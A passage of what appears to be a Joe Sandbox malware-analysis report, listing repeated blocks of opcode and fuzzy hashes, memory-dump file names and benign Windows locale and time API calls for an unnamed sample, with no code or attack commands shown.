                                                                                                                                                                                                                                        • Opcode ID: 23f29a1367b7a7cb9fa0874a208198d938464fb330570270a55c022a116111ac
                                                                                                                                                                                                                                        • Instruction ID: 46c2194ed0d7e0132b840905bb56c1cecde38b7cc7d097f21f993cf2f439ff53
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23f29a1367b7a7cb9fa0874a208198d938464fb330570270a55c022a116111ac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEB1E47890070ACBCBA89F68C451FBFB7A1AF54304F14461FD49297392C73DA946CBA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                        • Opcode ID: 03cd71536961c5bf2b70fefa0bd56ca2c8afe310552a490e84392e490dd7474b
                                                                                                                                                                                                                                        • Instruction ID: 29c7413617db4445cc9ec466933098f8f59c5ef8f9a6816d9753ec1d2b7d84d1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03cd71536961c5bf2b70fefa0bd56ca2c8afe310552a490e84392e490dd7474b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5B1043490060ACBCB648F69C854BBFB7A4AB01304F14462FD956D7391CB3DAD46CB5E
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(004F3570,00000001), ref: 004F3474
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2099609381-0
                                                                                                                                                                                                                                        • Opcode ID: 29d9b31b8782845f23065cde291d560e5799fdd6c79a31b158b1877dc30cbc20
                                                                                                                                                                                                                                        • Instruction ID: 313a27cff687417585c3c3941e91f7ffafe5122c7b7ec1e4d7a76b5a758c3e0d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29d9b31b8782845f23065cde291d560e5799fdd6c79a31b158b1877dc30cbc20
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B21129362007095FDB189F39C89167AB792FF8035AB14442DEA4687B40D375AA42C744
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004F378C,00000000,00000000,?), ref: 004F3B3D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                        • Opcode ID: ede05c128f489eda554aac31df035d30fe319062be8c10a730dfc8b2daeb79a3
                                                                                                                                                                                                                                        • Instruction ID: bcf5dc35fe8a67790a0ee2cddaaccc3a5069d49c9edf10d0b207ddf64c78716a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ede05c128f489eda554aac31df035d30fe319062be8c10a730dfc8b2daeb79a3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABF02D3260011ABBDF289F25CC15BBB7758DB40356F04056AEE05A3281DA78FF41C594
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(004F3857,00000001), ref: 004F350D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2099609381-0
                                                                                                                                                                                                                                        • Opcode ID: 29cfb8ce3597b5a548ec11b105ce9718de43d9cb3ccf792cd583601fe76d56c1
                                                                                                                                                                                                                                        • Instruction ID: e7cbd42dc5f54bdac25c19291f277a7a96c6495d42e9a710e30c3f7ec29e47cb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29cfb8ce3597b5a548ec11b105ce9718de43d9cb3ccf792cd583601fe76d56c1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FF0F6363003086FDB146F39E881A7B7BD1EFC176DF15442EFA054B690C6B9AE41D614
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(Function_00094E14,00000001,0051E078,0000000C), ref: 004E4E62
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2099609381-0
                                                                                                                                                                                                                                        • Opcode ID: 7a6805b5071285b0e7546d2d415f6e7250615f301528c7f6a2990381b3ab5742
                                                                                                                                                                                                                                        • Instruction ID: 5ce67a27318437cac90860e0c2956961f796b97df4232533da9d500b05a39de0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a6805b5071285b0e7546d2d415f6e7250615f301528c7f6a2990381b3ab5742
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30F03C36A40300DFD700DF99D806B9C77B0FB49726F10816AF800AB2A1C7B94909DF98
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002), ref: 00495A83
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                        • Opcode ID: 24315f5e4b0b66686a697a1950e132695ec5e79e1fcfecae3e72ca2c13dc94e3
                                                                                                                                                                                                                                        • Instruction ID: a837180e19ac97de2744c4bde7b33e9e9c0a99c9ddd4ccb067f75bb009e6c21e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24315f5e4b0b66686a697a1950e132695ec5e79e1fcfecae3e72ca2c13dc94e3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90E0D13225020475DF069BBD9D4FF673A99E70170AF508352F103D51D1D9B8CA00D35D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(004F32B0,00000001), ref: 004F33B7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2099609381-0
                                                                                                                                                                                                                                        • Opcode ID: 77a11a58083bbc1338b912f0a075fa191b514283026a057b04ae3cbaf88c5812
                                                                                                                                                                                                                                        • Instruction ID: 1c803f4432b82ca1c3ba950854e90530ec0cf05c23c90354773aa55245dfd82f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77a11a58083bbc1338b912f0a075fa191b514283026a057b04ae3cbaf88c5812
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAF0553630020997CB04DF3AC809A7BBF90EFC1729F06409EEF058B690CA799942C794
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?), ref: 004E5BA8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                        • Opcode ID: 796af419431ddbbeafb796782d0cd2a20c054702513ddbebee74d04d88ef4935
                                                                                                                                                                                                                                        • Instruction ID: 0655dec4b3e1c74b248abcebed6395e944a27ba26dd8731bd0dd283f99111b9b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 796af419431ddbbeafb796782d0cd2a20c054702513ddbebee74d04d88ef4935
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10E04F3250065CBFCF232F62DC04EAE3F1AEF54766F004016FD4566222CB759D21AA99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(Function_00094E14,00000001), ref: 004E5033
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2099609381-0
                                                                                                                                                                                                                                        • Opcode ID: b534dcbe15c5cda44bb52f3a7c6b3d419d4a9c8d5ad979126acd7d25b3481e94
                                                                                                                                                                                                                                        • Instruction ID: 085c406f3e31de647d5b29d1d09775055f5ca64699a38b6c56cf71743467ba00
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b534dcbe15c5cda44bb52f3a7c6b3d419d4a9c8d5ad979126acd7d25b3481e94
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BD0A936448744AFCB009F9BEC0B9243B66F390711F40002AF808073A0EAF2684AEF88
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                                                                                        • API String ID: 0-595813830
                                                                                                                                                                                                                                        • Opcode ID: 51543e8c81787a008a8fe04c06abc352ff06798aefac9fa05ba457fdbcaefa6b
                                                                                                                                                                                                                                        • Instruction ID: b6087c4bc0d5c7b6a8335eb2f85ad453f278e8e11a3876440e1126069ec2eb64
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51543e8c81787a008a8fe04c06abc352ff06798aefac9fa05ba457fdbcaefa6b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FE02B367C062877E610268B6C0AEDE7F05E750BB3F040072FA1C56242DAF948A0C6E5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b9d06843d424ee19df04ac7f27b9719cf26447f84fc9c592ee26a729b0f1ff84
